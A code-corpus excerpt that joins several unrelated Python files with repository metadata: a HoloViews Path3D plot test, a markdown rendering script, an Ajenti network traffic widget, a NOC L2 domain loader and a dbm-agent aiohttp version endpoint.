self.assertEqual(state['data'][1]['mode'], 'lines')
self.assertEqual(state['data'][1]['type'], 'scatter3d')
self.assertEqual(state['layout']['scene']['xaxis']['range'], [-3, 2])
self.assertEqual(state['layout']['scene']['yaxis']['range'], [1, 3])
self.assertEqual(state['layout']['scene']['zaxis']['range'], [0, 5])
def test_path3D_multi_colors(self):
path3D = Path3D([[(0, 1, 0, 'red'), (1, 2, 1, 'red'), (2, 3, 2, 'red')],
[(-1, 1, 3, 'blue'), (-2, 2, 4, 'blue'), (-3, 3, 5, 'blue')]],
vdims='color').opts(color='color')
state = self._get_plot_state(path3D)
self.assertEqual(state['data'][0]['line']['color'], 'red')
self.assertEqual(state['data'][1]['line']['color'], 'blue')
def test_visible(self):
element = Path3D([(0, 1, 0), (1, 2, 1), (2, 3, 2)]).opts(visible=False)
state = self._get_plot_state(element)
self.assertEqual(state['data'][0]['visible'], False)
|
b7fbf48911cb0b047756a1cf73ee9e832a53d691
|
33c443346aa9309cfda431e79a2a281df8ed9bb7
|
/myblog/mdtest.py
|
cf63eda4e2a41bc9e94868dbc54b4a7b6954e719
|
[] |
no_license
|
newpanjing/myblog
|
a3b3bc25b2ee7bc33006411bf5ce5710641eed4a
|
e0dc06231fb574ff8d18c1f0751acbcf33444539
|
refs/heads/master
| 2023-04-30T07:34:41.078441
| 2022-06-03T14:25:49
| 2022-06-03T14:25:49
| 143,099,403
| 140
| 56
| null | 2023-04-21T20:32:38
| 2018-08-01T03:30:45
|
Python
|
UTF-8
|
Python
| false
| false
| 295
|
py
|
mdtest.py
|
import markdown
print(markdown.markdown('''
[TOC]
# What is this operation
This is a drone
## Later on
```python
aa=123
print(aa)
for i in range(1,100):
print(i)
```
''', extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
'markdown.extensions.toc',
]))
|
89785a1feafe1eccbead9726a53fd2cfe59243a9
|
154f710627739de4c5c53716f6ee961282ac920c
|
/plugins/traffic/widget.py
|
a9ed9473729e9d295135a15efed448e3ee125bcb
|
[
"MIT"
] |
permissive
|
ajenti/ajenti
|
3bff32d6fffca13ce8fc777c9a68a70f7338bdb3
|
5ab0dd3f08d2928810d8235123bda3b071d02a97
|
refs/heads/master
| 2023-08-29T11:40:49.368067
| 2023-08-05T14:02:58
| 2023-08-05T14:02:58
| 544,208
| 4,376
| 770
|
MIT
| 2023-08-02T02:20:33
| 2010-03-03T08:04:15
|
Python
|
UTF-8
|
Python
| false
| false
| 648
|
py
|
widget.py
|
import psutil
from jadi import component
from aj.plugins.dashboard.api import Widget
@component(Widget)
class TrafficWidget(Widget):
id = 'traffic'
name = _('Traffic')
template = '/traffic:resources/partial/widget.html'
config_template = '/traffic:resources/partial/widget.config.html'
def __init__(self, context):
Widget.__init__(self, context)
def get_value(self, config):
info = psutil.net_io_counters(pernic=True).get(config.get('interface', None), None)
if not info:
return None
return {
'tx': info.bytes_sent,
'rx': info.bytes_recv,
}
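# Illustrative shape of the psutil data consumed above (values vary by host,
# and 'eth0' is just an example interface name):
#
#   >>> import psutil
#   >>> psutil.net_io_counters(pernic=True)['eth0']
#   snetio(bytes_sent=14509483, bytes_recv=62749361, packets_sent=84311,
#          packets_recv=94941, errin=0, errout=0, dropin=0, dropout=0)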
|
6f6c7f7cd17de232c3560b26171767acbee2cda5
|
2337351b228818e41be3002bd38f68f77c2aa074
|
/core/etl/loader/l2domain.py
|
0b21396a6dcdee516db0ef8a287c34ea781df5bc
|
[
"BSD-3-Clause"
] |
permissive
|
nocproject/noc
|
57d40c680a1499374463e472434f9595ed6d1374
|
6e6d71574e9b9d822bec572cc629a0ea73604a59
|
refs/heads/master
| 2023-08-31T01:11:33.544573
| 2023-08-30T17:31:11
| 2023-08-30T17:31:11
| 107,815,776
| 105
| 33
|
BSD-3-Clause
| 2023-07-31T07:57:45
| 2017-10-21T21:04:33
|
Python
|
UTF-8
|
Python
| false
| false
| 600
|
py
|
l2domain.py
|
# ----------------------------------------------------------------------
# L2 Domain Loader
# ----------------------------------------------------------------------
# Copyright (C) 2007-2023 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# NOC modules
from .base import BaseLoader
from ..models.l2domain import L2Domain
from noc.vc.models.l2domain import L2Domain as L2DomainModel
class L2DomainLoader(BaseLoader):
"""
L2Domain loader
"""
name = "l2domain"
model = L2DomainModel
data_model = L2Domain
|
a77b840609119557d3875de064d415a9cd315816
|
bc95060fe849162b5d3be79380f496ecf06b2ad9
|
/dbma/core/views/dbmagentview.py
|
fc1fd883c47770fa26381081c13fb96c63002e64
|
[] |
no_license
|
Neeky/dbm-agent
|
9ac8205b0ee9e09490e0279b709bd4b4d4f7d610
|
3d92fbac91d561c91789f425330fdbb9b41f62bd
|
refs/heads/master
| 2023-08-05T06:48:17.722028
| 2023-08-01T12:49:32
| 2023-08-01T12:49:32
| 174,054,080
| 183
| 84
| null | 2023-04-11T03:44:32
| 2019-03-06T02:14:26
|
Jinja
|
UTF-8
|
Python
| false
| false
| 455
|
py
|
dbmagentview.py
|
# -*- encoding: utf-8 -*-
"""dbm-agent internal data API.
"""
import logging
from aiohttp import web
from dbma.core.router import routes
from dbma.version import DBM_AGENT_VESION
@routes.view("/apis/dbm-agent")
class DbmAgentView(web.View):
"""
dbm-agent http 接口实现
"""
async def get(self):
"""返回 dbm-agent 的版本号信息"""
return web.json_response({"name": "dbm-agent", "version": DBM_AGENT_VESION})
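# Illustrative client-side check of the endpoint above (assumes a dbm-agent
# instance listening on the placeholder host/port):
#
#   import asyncio
#   import aiohttp
#
#   async def check():
#       async with aiohttp.ClientSession() as session:
#           async with session.get("http://127.0.0.1:8086/apis/dbm-agent") as resp:
#               print(await resp.json())  # {"name": "dbm-agent", "version": "..."}
#
#   asyncio.run(check())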
|